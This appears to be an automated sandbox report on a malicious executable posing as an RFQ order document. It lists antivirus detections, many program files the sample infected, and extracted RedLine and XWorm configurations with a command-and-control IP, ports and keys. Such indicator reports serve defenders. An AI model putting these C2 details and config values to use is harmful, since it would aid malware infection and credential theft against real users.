Windows Analysis Report
RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

AV Detection

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Avira: detected

Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen

Source: 00000005.00000002.1272520755.0000000003CB4000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": ["204.10.161.147:7082"], "Bot Id": "success", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["204.10.161.147"], "Port": 7081, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Virustotal: Detection: 74%			Perma Link
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	ReversingLabs: Detection: 83%

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 204.10.161.147
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 7081
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp	String decryptor: %AppData%
Source: 00000005.00000002.1271729199.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XClient.exe

Compliance

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000003.00000003.1667592386.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: $$.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdbr source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1221869185.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000003.00000003.1741573963.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1751690335.0000000000530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1740392594.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.1373522037.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000003.00000003.1525511064.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000003.00000003.1525511064.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000003.00000003.1538669314.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.1829809369.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1826627014.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: elevation_service.exe, 0000000A.00000003.2462788704.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 00000003.00000003.2099214565.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: exhilaratingly.exe, 00000004.00000003.1250656457.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000003.1251704935.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1386854712.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1372833431.0000000004900000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.1490257578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000003.00000003.1659027257.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000003.00000003.1801207586.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.1677652221.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1686851287.0000000000530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdbegSvcs.pdbpdbvcs.pdbv4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbdo source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000003.00000003.1562647186.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000003.00000003.1391605878.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ?'oC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @'o.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 0000000A.00000003.2441683485.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: o0C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbW source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000948000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000003.00000003.1538669314.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000003.00000003.1418745424.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000003.00000003.1391605878.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000003.00000003.1741573963.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1751690335.0000000000530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1740392594.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbB source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.1490257578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000003.00000003.1585909463.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.1373522037.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.1829809369.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1826627014.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000003.00000003.1281053363.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.1646234871.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 0000000A.00000003.2468045402.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000003.00000003.1801207586.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000003.00000003.1632221337.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000003.00000003.1562647186.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000003.00000003.1637197730.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000003.00000003.1585909463.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000003.00000003.1667592386.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wsymbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBs source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000003.00000003.1659027257.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000003.00000003.1281053363.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.1677652221.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1686851287.0000000000530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: exhilaratingly.exe, 00000004.00000003.1250656457.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000003.1251704935.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1386854712.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1372833431.0000000004900000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000003.00000003.1593228986.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1226639947.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegSvcs.pdb* source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: elevation_service.exe, 0000000A.00000003.2468045402.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 0000000A.00000003.2441683485.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1226639947.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 0000000A.00000003.2462788704.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000003.00000003.1418745424.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.1780210490.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.1637197730.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000003.00000003.1593228986.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.1780210490.0000000001450000.00000004.00001000.00020000.00000000.sdmp

Spreading

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedgewebview2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\BHO\ie_to_edge_stub.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedgewebview2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_pwa_launcher.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe			Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	System file written: C:\Windows\System32\AppVClient.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_proxy.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_proxy.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\notification_click_helper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe			Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE			Jump to behavior
